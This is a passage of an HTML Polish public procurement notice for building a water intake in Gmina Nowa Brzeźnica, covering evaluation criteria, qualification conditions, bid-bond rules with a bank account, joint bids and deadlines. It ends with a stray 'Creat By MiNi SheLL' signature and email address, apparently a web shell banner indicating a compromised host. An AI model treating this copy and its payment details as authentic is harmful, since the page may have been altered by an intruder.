class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 6.	Warunki udziału w postepowaniu <br/>6.1.	Zamawiający określa poniższe warunki udziału w postępowaniu dotyczące:<br/>6.1.1.	zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku dla obu części zamówienia.<br/>6.1.2.	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku dla obu części zamówienia.<br/>6.1.3.	sytuacji ekonomicznej lub finansowej:<br/>Zamawiający nie stawia szczegółowych wymagań w zakresie spełniania tego warunku dla obu części zamówienia.<br/>6.1.4.	zdolności technicznej lub zawodowej:<br/>Zamawiający stawia szczegółowe wymagania w zakresie oceny tych zdolności dla <br/>części 1 zamówienia tj. o zamówienie może ubiegać się wykonawca który :<br/>A.	zrealizował (rozpoczął i zakończył) w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej jedną roboty budowlane polegające na budowie, rozbudowie lub przebudowie, modernizacji ujęcia wody lub/i stacji uzdatniania wody o wartości minimum:<br/>a.	1 000 000,00 zł brutto<br/>B.	dysponuje lub będzie dysponował:<br/>a.	co najmniej jedną osobą, która pełnić będzie funkcję kierownika budowy (koordynator wszystkich branż) w branży konstrukcyjno – budowlanej, posiadającego uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno – budowlanej oraz posiadający doświadczenie zawodowe, jako kierownik budowy/robót lub co najmniej jedną osobą, która pełnić będzie funkcję kierownika budowy (koordynator wszystkich branż) w branży instalacyjno- sanitarnej, posiadającego uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych oraz posiadający doświadczenie zawodowe, jako kierownik budowy/robót;<br/>b.	co najmniej jedną osobą, która pełnić będzie funkcję kierownika robót branży instalacyjno - sanitarnej; <br/>c.	co najmniej jedną osobą, która pełnić będzie funkcję kierownika robót branży elektrycznej;<br/>d.	co najmniej jedną osobę, która posiada doświadczenie zawodowe projektanta sieci i urządzeń sanitarnych .<br/>Przez uprawnienia budowlane wskazane powyżej należy rozumieć uprawnienia budowlane, o których mowa w ustawie z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2021 r. poz. 2351 z późn. zm.) oraz w rozporządzeniu Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2019r. poz. 831) lub odpowiadające im ważne uprawnienia budowlane wydane na podstawie uprzednio obowiązujących przepisów prawa lub uznane przez właściwy organ zgodnie z ustawa z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2021 r. poz. 1646).<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia: w odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają usługi, roboty budowlane do realizacji których te zdolności są wymagane.<br/>Zamawiający stawia szczegółowe wymagania w zakresie oceny tych zdolności dla części 2 zamówienia tj. o zamówienie może ubiegać się wykonawca który :<br/>A.	pełnił funkcję inspektora nadzoru inwestorskiego w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co najmniej dla dwóch inwestycji związanych z robotami budowlanymi polegającymi na budowie, rozbudowie lub przebudowie ujęcia wody lub/i stację uzdatniania wody. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Dla części 1 zamówienia:<br/>– wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Wzór określony w Rozdziale III do SWZ;<br/>- wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. Wzór określony w Rozdziale III do SWZ.<br/>Dla części 2 zamówienia:<br/>- wykaz inwestycji związanych z robotami budowlanymi polegającymi na budowie, rozbudowie lub przebudowie ujęcia wody lub/i stację uzdatniania wody, w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, w których Wykonawca pełnił funkcję inspektora nadzoru inwestorskiego.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wymagane oświadczenia są zawarte w Rozdział II SWZ ZP.271.1.2024 <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 11.	Wymagania dotyczące wadium<br/>11.1.	Zamawiający określa kwotę wadium wyłącznie dla części 1 w wysokości 40 000,00 złotych (słownie : czterdzieści tysięcy złotych 00/100).<br/>11.2.	Wadium wykonawca wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofert.<br/>11.3.	Wadium może być wnoszone według wyboru wykonawcy w jednej lub kilku następujących formach:<br/>1)	pieniądzu;<br/>2)	gwarancjach bankowych;<br/>3)	gwarancjach ubezpieczeniowych;<br/>4)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. z 2020r, poz. 299).<br/>11.4.	Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego w Banku Spółdzielczego w Pajęcznie oddział w Nowej Brzeźnicy Nr rachunku: 82 8265 1024 2001 0000 0026 0010 z dopiskiem:<br/>Wadium- „Budowa ujęcia wody w Gminie Nowa Brzeźnica”-część 1;<br/>11.5.	Wadium wniesione w pieniądzu uważa się za wniesione w sposób prawidłowy, gdy środki pieniężne wpłyną na konto zamawiającego przed upływem terminu składnia ofert.<br/>11.6.	Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym.<br/>11.7.	Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w ust. 3 pkt 2–4, wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>11.8.	W przypadku składania przez wykonawcę wadium w formie gwarancji lub poręczenia, gwarancja lub poręczenie powinno być sporządzone zgodnie z obowiązującym prawem i winno zawierać następujące elementy:<br/>11.8.1.	nazwę dającego zlecenie (wykonawcy) (w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia – zaleca się wymienienie wszystkich wykonawców), beneficjenta gwarancji lub poręczenia (zamawiającego), gwaranta lub poręczyciela (np. banku lub instytucji ubezpieczeniowej udzielających gwarancji lub poręczenia) oraz wskazanie ich siedzib,<br/>11.8.2.	określenie wierzytelności, która ma być zabezpieczona gwarancją lub poręczeniem,<br/>11.8.3.	kwotę gwarancji lub poręczenia,<br/>11.8.4.	termin ważności gwarancji lub poręczenia (który nie może być krótszy niż termin związania Wykonawcy złożoną przez niego ofertą),<br/>11.8.5.	nieodwołalne i bezwarunkowe zobowiązanie gwaranta lub poręczyciela do zapłacenia kwoty gwarancji lub poręczenia na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż:<br/>11.8.5.1.	wykonawca, którego ofertę wybrano: (i) odmówił podpisania umowy na warunkach określonych w ofercie, lub (ii) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy, lub (iii) zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie wykonawcy, którego oferta została wybrana; <br/>11.8.5.2.	wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 107 ust. 2 Pzp lub art. 128 ust. 1 Pzp, z przyczyn leżących po jego stronie, nie złożył podmiotowych środków dowodowych lub przedmiotowych środków dowodowych potwierdzających okoliczności, o których mowa w art. 57 lub art. 106 ust. 1 Pzp, oświadczenia, o którym mowa w art. 125 ust. 1 Pzp, innych dokumentów lub oświadczeń lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 223 ust. 2 pkt 3 Pzp, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej<br/>11.8.6.	oznaczenie postępowania, którego wadium dotyczy wraz z podaniem numeru części, na którą/które składa ofertę.<br/>Zamawiający nie wymaga wniesienia wadium dla części 2 zamówienia.<br/>Szczegółowe informacje dot. wadium zawarte zostały w pkt. 11 Rozdziału I Specyfikacji Warunków Zamówienia <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 7.6. Wykonawcy wspólnie ubiegający się o zamówienie:<br/>1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Przepisy dotyczące wykonawcy stosuje się<br/>odpowiednio do wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>2) W takim przypadku, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>3) W przypadku wspólnego ubiegania się o zamówienie przez wykonawców, oświadczenie, o którym mowa w pkt 7.1.,<br/>składa każdy z wykonawców. Oświadczenia te dołączone do oferty potwierdzają brak podstaw wykluczenia oraz spełnianie<br/>warunków udziału w postępowaniu w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w<br/>postępowaniu.<br/>4) W przypadku określenia przez Zamawiającego warunku dotyczącego zdolności do występowania w obrocie<br/>gospodarczym lub zdolności technicznej lub zawodowej wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>dołączają do oferty oświadczenie, o którym mowa w pkt 6.4 IDW, z którego wynika, które roboty budowlane, dostawy lub<br/>usługi wykonają poszczególni wykonawcy. Formularz oświadczenia stanowi załącznik nr 3 do IDW.<br/>5) Jeżeli zostanie wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający będzie<br/>żądał przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych wykonawców.<br/>7.7. W zakresie rodzajów, okresu ważności i formy, w jakiej mogą być składane oświadczenia lub dokumenty, o których<br/>mowa w pkt 7.4. SWZ obowiązują przepisy Rozporządzenia Ministra Rozwoju, Pracy i Technologii z dnia 23 grudnia 2020 r.<br/>w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń, jakich może żądać zamawiający<br/>od wykonawcy (Dz.U z 2020 r. poz. 2415)<br/>7.8. Informacja o przedmiotowych środkach dowodowych<br/>Zamawiający nie określa przedmiotowych środków dowodowych w celu potwierdzenia zgodności oferowanych dostaw,<br/>usług lub robót budowlanych z wymaganiami, cechami lub kryteriami określonymi w opisie przedmiotu zamówienia lub<br/>opisie kryteriów oceny ofert lub wymaganiami związanymi z realizacja zamówienia <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj, zakres zmian oraz warunki ich wprowadzenia zostały określone w Rozdziale IV SWZ - Projekt umowy w sprawie zamówienia publicznego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-02-14 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć poprzez Platformy Marketplanet dostępny pod adresem: https://nowabrzeznica.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-02-14 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2024-03-15</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com